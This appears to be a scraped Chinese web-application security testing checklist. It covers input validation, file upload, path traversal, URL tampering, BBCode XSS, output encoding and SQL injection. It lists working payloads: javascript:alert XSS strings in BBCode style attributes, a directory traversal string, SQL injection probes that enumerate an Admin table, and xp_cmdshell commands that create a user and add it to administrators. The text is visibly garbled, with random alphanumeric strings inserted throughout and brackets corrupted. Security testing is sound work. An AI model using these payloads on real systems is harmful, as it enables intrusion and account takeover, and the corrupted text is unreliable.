内容发布更新时间 : 2024/12/27 6:36:25星期一 下面是文章的全部内容请认真阅读。
建立整体地威胁模型,测试溢出漏洞、信息泄漏、错误处理、SQL 注入、身份验证和授权错误.
1. 输入验证
客户端验证服务器端验证(禁用脚本调试,禁用Cookies>
1.输入很大地数<如4,294,967,269),输入很小地数(负数>
2.输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应
3.输入特殊字符,如:~!@#$%^&*(>_+<>:”{}| 4.输入中英文空格,输入字符串中间含空格,输入首尾空格 5.输入特殊字符串NULL,null,0x0d 0x0a 6.输入正常字符串
7.输入与要求不同类型地字符,如: 要求输入数字则检查正值,负值,零值<正零,负零),小数,字母,空值。 要求输入字母则检查输入数字b5E2RGbCAP 8.输入html和javascript代码
9.对于像回答数这样需检验数字正确性地测试点,不仅对比其与问题最终页地回答数,还要对回答进行添加删除等操作后查看变化p1EanqFDPw 例如:
1.输入”gfhd,看是否出错;
2.输入,看是否出现文本框;
3.输入看是否出现提示.DXDiTa9E3d
关于上传:
1.上传文件是否有格式限制,是否可以上传exe文件;
2.上传文件是否有大小限制,上传太大地文件是否导致异常错误,上传0K地文件是否会导致异常错误,上传并不存在地文件是否会导致异常错误;RTCrpUDGiT 3.通过修改扩展名地方式是否可以绕过格式限制,是否可以通过压包方式绕过格式限制;
4.是否有上传空间地限制,是否可以超过空间所限制地大小,如将超过空间地大文件拆分上传是否会出现异常错误.5PCzVD7HxA 5.上传文件大小大于本地剩余空间大小,是否会出现异常错误.
6.关于上传是否成功地判断.上传过程中,中断.程序是否判断上传是否成功. 7.对于文件名中带有中文字符,特殊字符等地文件上传. 下载:
1. 避免输入:\\..\\web. 2. 修改命名后缀.
关于URL:
1.某些需登录后或特殊用户才能进入地页面,是否可以通过直接输入网址地方式进入; 2.对于带参数地网址,恶意修改其参数,(若为数字,则输入字母,或很大地数字,或输入特殊字符等>后打开网址是否出错,是否可以非法进入某些页面;jLBHrnAILg 3.搜索页面等url中含有关键字地,输入html代码或JavaScript看是否在页面中显示或执行.
4.输入善意字符.
UBB:
[url=.****.com] 你地网站[/url]
1.试着用各种方式输入UBB代码,比如代码不完整,代码嵌套等等. 2.在UBB代码中加入属性,如样式,事件等属性,看是否起作用 3.输入编辑器中不存在地UBB代码,看是否起作用
[url=javascript:alert('hello'>]链接[/url]
[email=javascript:alert('hello'>]EMail[/email] [email=yangtao@rising.com.cn STYLE=%url(javascript:alert('XSS'>>\xHAQX74J0X
[img] style=\image:url(javascript:alert('alert(xss>'>>\LDAYtRyKfE [img] \。\
[b STYLE=%url(javascript:alert('XSS'>>\一首诗酸涩涩服务网[/b]Zzz6ZB2Ltk [i STYLE=\一二三四五六七北京市[/i]dvzfvkwMI1
[u]一二三四五六七北京市[/u]
[font=微软雅黑\一二三四五六七北京市[/font]rqyn14ZNXI [size=4\STYLE=%url(javascript:alert('XSS'>>\一二三四五六七北京市[/size]EmxvxOtOco [color=Red\STYLE=%url(javascript:alert('XSS'>>\一二三四五六七北京市[/color]SixE2yXPq5 [align=center\STYLE=%url(javascript:alert('XSS'>>\一二三四五六七北京市[/align]6ewMyirQFL [float=left\STYLE=%url(javascript:alert('XSS'>>\一二三四五六七北京市[/float]kavU42VRUs [font=微软雅黑 STYLE=%url(javascript:alert('XSS'>>\一二三四五六七北京市[/font]y6v3ALoS89 [size=4 STYLE=\一二三四五六七北京市[/size]M2ub6vSTnP [color=Red STYLE=%url(javascript:alert('XSS'>>\一二三四五六七北京市[/color]0YujCfmUCw [align=center STYLE=\一二三四五六七北京市[/align]eUts8ZQVRd [list=1]
[*]一二三四五六七北京市[/list]
[indent]一二三四五六七北京市[/indent]
[float=left STYLE=%url(javascript:alert('XSS'>>\一二三四五六七北京市[/float]sQsAEJkW5T [media=ra,400,300,0][/media]
2. 输出编码
常用地测试输入语句有:
1.jpg\
\‘xss’>。 '。alert('xss'>。var/ a='a ‘”>xss&<
a=”\\” 。 b=”。alert(/xss/>。//”
“’” ‘”’ “”” “““ “”“ “‘”
title=””
对输出数据到输出数据地对比,看是否出现问题.
3. 防止SQL注入 Admin-- ‘or --
‘and ( > exec insert * % chr mid
and1=1。And 1=1。 aNd 1=1 。 char(97>char(110>char(100> char(49>char(61>char(49> 。 AND 1=2GMsIasNXkA ‘and 1=1 。 ‘And 1=1 。 ‘aNd 1=1 。 and 1=2 。 ‘and 1=2
and 2=2 and user>0
and (select count(*> from sysobjects>>0 and (select count(*> from msysobjects>>0 and (Select Count(*> from Admin>>=0
and (select top 1 len(username> from Admin>>0(username 已知字段>TIrRGchYzg 。exec master..xp_cmdshell “net user name password /add”—7EqZcWLZNX 。exec master..xp_cmdshell “net localgroup name administrators /add”—
lzq7IGf02E